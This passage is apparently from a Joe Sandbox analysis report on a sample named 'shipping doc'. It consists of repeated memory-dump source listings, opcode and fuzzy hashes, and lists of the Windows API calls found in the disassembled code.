                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 455545452-0
                                                                                              • Opcode ID: de80f76472c7a5284bc8dce4c37b0b758c2c2a536c1842f994c970175af5ce98
                                                                                              • Instruction ID: 43700a5995dc99a82fcae9072a31eda8453ec67a553ed26c9abe5c98100aec63
                                                                                              • Opcode Fuzzy Hash: de80f76472c7a5284bc8dce4c37b0b758c2c2a536c1842f994c970175af5ce98
                                                                                              • Instruction Fuzzy Hash: 3511D675A00608A6DB209F61CC85AEE777CFF14764F50C02AFA1DD6081E7F0D980CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a56479b9124961aeb349726a0b6d91ee649dabb1d41e64a270c823430522a1f
                                                                                              • Instruction ID: b4f2bca8e91f4126783e016b58d7b4ec629d0f64732f2b485d3660021605256b
                                                                                              • Opcode Fuzzy Hash: 6a56479b9124961aeb349726a0b6d91ee649dabb1d41e64a270c823430522a1f
                                                                                              • Instruction Fuzzy Hash: 2A01A2B2209A1A7EFA1926B87CC5FABA65CDF513B8B310339F625511D2DB708CD04160
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00141A47
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00141A59
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00141A6F
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00141A8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 1e9e27b8990d9c39b0167d4b6affae4a55e03a1b4fdbad79b0cf177455e84f48
                                                                                              • Instruction ID: 7f34bfcba3ca7ca1327b7331d95f488ba4f60c82b9af33df52450e2dd5ba58fe
                                                                                              • Opcode Fuzzy Hash: 1e9e27b8990d9c39b0167d4b6affae4a55e03a1b4fdbad79b0cf177455e84f48
                                                                                              • Instruction Fuzzy Hash: 54113C3AD01219FFEB10DBA4CD85FADBB79EB04750F200495E604B7290D7716E90DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0014E1FD
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 0014E230
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0014E246
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0014E24D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2880819207-0
                                                                                              • Opcode ID: 6af43c7bfef21d607a7bcd0c1779fd1ba90fd4579602ad99f478c88e9ffa9264
                                                                                              • Instruction ID: b38916339c995665393525cc24e60e35dbbf8941d079afb809d8989b3cfcf029
                                                                                              • Opcode Fuzzy Hash: 6af43c7bfef21d607a7bcd0c1779fd1ba90fd4579602ad99f478c88e9ffa9264
                                                                                              • Instruction Fuzzy Hash: FE110876904214BBC7019BA89C05E9F7FEDBB45320F414329F819E36A0D7B0898087A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,?,0010CFF9,00000000,00000004,00000000), ref: 0010D218
                                                                                              • GetLastError.KERNEL32 ref: 0010D224
                                                                                              • __dosmaperr.LIBCMT ref: 0010D22B
                                                                                              • ResumeThread.KERNEL32(00000000), ref: 0010D249
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 173952441-0
                                                                                              • Opcode ID: 2eb0f05f17c5a865a4205946cc27e738117df33d5094f63fa647fdf5a540a82f
                                                                                              • Instruction ID: af47b6da2c73ff088fc5dc64172fd815094fa3635c8bd1d31f34eef071cb0511
                                                                                              • Opcode Fuzzy Hash: 2eb0f05f17c5a865a4205946cc27e738117df33d5094f63fa647fdf5a540a82f
                                                                                              • Instruction Fuzzy Hash: B101F936805204BBD7216BE5EC05BAF7A69EF91730F104219F965961D0CFF0C981C7E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000E604C
                                                                                              • GetStockObject.GDI32(00000011), ref: 000E6060
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 000E606A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3970641297-0
                                                                                              • Opcode ID: ac0ff2b110d0112159df5f1dfbd1abe085f983e193ece955ea097b8d4c1f3771
                                                                                              • Instruction ID: 083ada10d6531b6b9ca85e9226cc72eda3d04978adb48e2ccffc613ca30d50bd
                                                                                              • Opcode Fuzzy Hash: ac0ff2b110d0112159df5f1dfbd1abe085f983e193ece955ea097b8d4c1f3771
                                                                                              • Instruction Fuzzy Hash: EF116172501558BFEF565F95AC54EEB7BB9EF183A4F040216FA1462110D732ACA0DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00103B56
                                                                                                • Part of subcall function 00103AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00103AD2
                                                                                                • Part of subcall function 00103AA3: ___AdjustPointer.LIBCMT ref: 00103AED
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00103B6B
                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00103B7C
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00103BA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 737400349-0
                                                                                              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                              • Instruction ID: d72ebd49bd2e4d95381314a9a6e84a991be2835c129bce5d23be0461324989df
                                                                                              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                              • Instruction Fuzzy Hash: A2014072100148BBDF115E95CC42EEB3F6DEF58758F044414FE9896161C772D961EBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000E13C6,00000000,00000000,?,0011301A,000E13C6,00000000,00000000,00000000,?,0011328B,00000006,FlsSetValue), ref: 001130A5
                                                                                              • GetLastError.KERNEL32(?,0011301A,000E13C6,00000000,00000000,00000000,?,0011328B,00000006,FlsSetValue,00182290,FlsSetValue,00000000,00000364,?,00112E46), ref: 001130B1
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0011301A,000E13C6,00000000,00000000,00000000,?,0011328B,00000006,FlsSetValue,00182290,FlsSetValue,00000000), ref: 001130BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 036211bad3518542d08adfee1d4ececf2dd1616dbc422ef1729f3d9d71d10fa0
                                                                                              • Instruction ID: ee0869c6d61cb86abb93c9976c7dbee5fb026f78facd6a4ab173c206ec546e72
                                                                                              • Opcode Fuzzy Hash: 036211bad3518542d08adfee1d4ececf2dd1616dbc422ef1729f3d9d71d10fa0
                                                                                              • Instruction Fuzzy Hash: DE01F732301632ABCB354B799C449AB7BE8AF0DB61B110634F929E3544DB21DAC1C7E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0014747F
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00147497
                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001474AC
                                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001474CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: c4832b4c899ae91f1e5ac9323f6b0be2bf364faf89fd8b554bba09e810ca3638
                                                                                              • Instruction ID: ee146c39430ad01d54d9daeaea5c865c9c0e8398d26cc51b250365047218f777
                                                                                              • Opcode Fuzzy Hash: c4832b4c899ae91f1e5ac9323f6b0be2bf364faf89fd8b554bba09e810ca3638
                                                                                              • Instruction Fuzzy Hash: 4511ADB1209310ABE7208F14DC08BA27BFCEB00B10F14856DA61AD65A1D7B0E984DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0014ACD3,?,00008000), ref: 0014B0C4
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0014ACD3,?,00008000), ref: 0014B0E9
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0014ACD3,?,00008000), ref: 0014B0F3
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0014ACD3,?,00008000), ref: 0014B126
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: 270ba9436cdc82beb3a32f4d2c5db0bc3f45c7f4c924206f6f07c8ec72e42407
                                                                                              • Instruction ID: 269b8f18a15d5087a516c335cc56549da43a1a5ad761c64025d7e8dd2f8328a4
                                                                                              • Opcode Fuzzy Hash: 270ba9436cdc82beb3a32f4d2c5db0bc3f45c7f4c924206f6f07c8ec72e42407
                                                                                              • Instruction Fuzzy Hash: 38115B71C0552CEBCF08AFE4E9A86FEBB78FF09711F114099E941B2191CB309690CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00177E33
                                                                                              • ScreenToClient.USER32(?,?), ref: 00177E4B
                                                                                              • ScreenToClient.USER32(?,?), ref: 00177E6F
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00177E8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 1a3bdd63a298da0d42f44aa358b53b462324cc46299eabec6f823937d9e6040b
                                                                                              • Instruction ID: 0a7ed6bed726fcafa9720a9a053b26930870032a6339b9d457b259e1a03a9b2d
                                                                                              • Opcode Fuzzy Hash: 1a3bdd63a298da0d42f44aa358b53b462324cc46299eabec6f823937d9e6040b
                                                                                              • Instruction Fuzzy Hash: F21186B9D0024AAFDB41CF98C8849EEBBF5FF08310F108056E915E3610D734AA94CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00142DC5
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00142DD6
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00142DDD
                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00142DE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: a254073ba56e186e38500d141a96f3fbc11999f1ebb9df8cbf0c1dfeb37743e6
                                                                                              • Instruction ID: ab3ec4f259cc6b395380d9ad2c9da7d9352256805dc2c9dc352745ad74dfe8d2
                                                                                              • Opcode Fuzzy Hash: a254073ba56e186e38500d141a96f3fbc11999f1ebb9df8cbf0c1dfeb37743e6
                                                                                              • Instruction Fuzzy Hash: 54E0ED71541624BAD7201BA29C4DEEB7E6CEB56BB1F800119F509D15909BA589C1C6F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F9693
                                                                                                • Part of subcall function 000F9639: SelectObject.GDI32(?,00000000), ref: 000F96A2
                                                                                                • Part of subcall function 000F9639: BeginPath.GDI32(?), ref: 000F96B9
                                                                                                • Part of subcall function 000F9639: SelectObject.GDI32(?,00000000), ref: 000F96E2
                                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00178887
                                                                                              • LineTo.GDI32(?,?,?), ref: 00178894
                                                                                              • EndPath.GDI32(?), ref: 001788A4
                                                                                              • StrokePath.GDI32(?), ref: 001788B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 1539411459-0
                                                                                              • Opcode ID: dd248918bf355058820583f35693b8b59b8e96800bfcb3cd730a280c3aefdf54
                                                                                              • Instruction ID: d28d8cb22436fdebc173ba2b0dc2b4271ad39c10a6dfa83c92a2f35e41294a41
                                                                                              • Opcode Fuzzy Hash: dd248918bf355058820583f35693b8b59b8e96800bfcb3cd730a280c3aefdf54
                                                                                              • Instruction Fuzzy Hash: B8F05E3A041258FADB126F94AC0DFCE3F69AF0A310F448104FB15654E2C7755591DFE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 000F98CC
                                                                                              • SetTextColor.GDI32(?,?), ref: 000F98D6
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 000F98E9
                                                                                              • GetStockObject.GDI32(00000005), ref: 000F98F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ModeObjectStockText
                                                                                              • String ID:
                                                                                              • API String ID: 4037423528-0
                                                                                              • Opcode ID: e0772469ccb1afd32da06ecac3e477f1f433a1c0a6fe4cee2b76caad9507c5bd
                                                                                              • Instruction ID: 2385c1c266ae24dc4cdee045017812eabe1edac82e7e82b97aafe5d9134c054f
                                                                                              • Opcode Fuzzy Hash: e0772469ccb1afd32da06ecac3e477f1f433a1c0a6fe4cee2b76caad9507c5bd
                                                                                              • Instruction Fuzzy Hash: 46E06D31244284EBDB215B78AC09BE83F61AB52336F14822DF6FA584E1C3B246C09B10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 00141634
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,001411D9), ref: 0014163B
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001411D9), ref: 00141648
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,001411D9), ref: 0014164F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: 150ca14f20c06a7499e8a934ac65e90276a5455c98be4bc58183d1b0153dc845
                                                                                              • Instruction ID: 639cab8a0b76fd1b50769e372537eecb31090509e6e2366ff1b868aeed0b42bc
                                                                                              • Opcode Fuzzy Hash: 150ca14f20c06a7499e8a934ac65e90276a5455c98be4bc58183d1b0153dc845
                                                                                              • Instruction Fuzzy Hash: 19E08C36602211EBD7201FA0AE0DB873B7CAF54792F15880CF24AD90A0E77484C0CBE4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 0013D858
                                                                                              • GetDC.USER32(00000000), ref: 0013D862
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0013D882
                                                                                              • ReleaseDC.USER32(?), ref: 0013D8A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
